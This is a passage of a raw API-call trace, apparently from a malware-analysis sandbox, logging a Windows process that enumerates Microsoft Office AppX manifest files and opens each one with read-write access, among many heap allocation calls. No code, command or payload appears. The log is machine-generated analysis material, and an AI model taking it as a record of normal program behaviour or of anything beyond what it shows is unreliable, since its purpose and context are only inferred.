(HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 105 [0099.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.152] GetFileType (hFile=0x368) returned 0x1 [0099.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.152] CloseHandle (hObject=0x368) returned 1 [0099.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0099.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0099.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0099.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0099.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0099.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0099.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0099.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0099.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.153] AreFileApisANSI () returned 1 [0099.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 105 [0099.153] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x831d63af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x834ab261, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.153] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.153] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.153] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeaa, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", cAlternateFileName="AP202C~1.XML")) returned 1 [0099.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d2c8 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d2c8 | out: hHeap=0x20000) returned 1 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x899e0 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x892a0 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x899e0 | out: hHeap=0x20000) returned 1 [0099.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x892a0 | out: hHeap=0x20000) returned 1 [0099.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.154] AreFileApisANSI () returned 1 [0099.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0099.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.155] AreFileApisANSI () returned 1 [0099.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 105 [0099.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.155] GetFileType (hFile=0x368) returned 0x1 [0099.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.155] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.155] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.156] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.156] CloseHandle (hObject=0x368) returned 1 [0099.156] AreFileApisANSI () returned 1 [0099.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 105 [0099.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.232] GetFileType (hFile=0x360) returned 0x1 [0099.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.232] CloseHandle (hObject=0x360) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0099.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0099.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0099.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0099.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0099.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0099.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0099.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0099.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.247] AreFileApisANSI () returned 1 [0099.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 105 [0099.247] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeaa)) returned 1 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.253] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8396fbd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8396fbd3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84391d75, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", cAlternateFileName="APBC30~1.XML")) returned 1 [0099.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0099.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0099.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c5a8 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0099.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0099.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0099.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.253] RtlAllocateHeap (HeapHandle=0x20000, 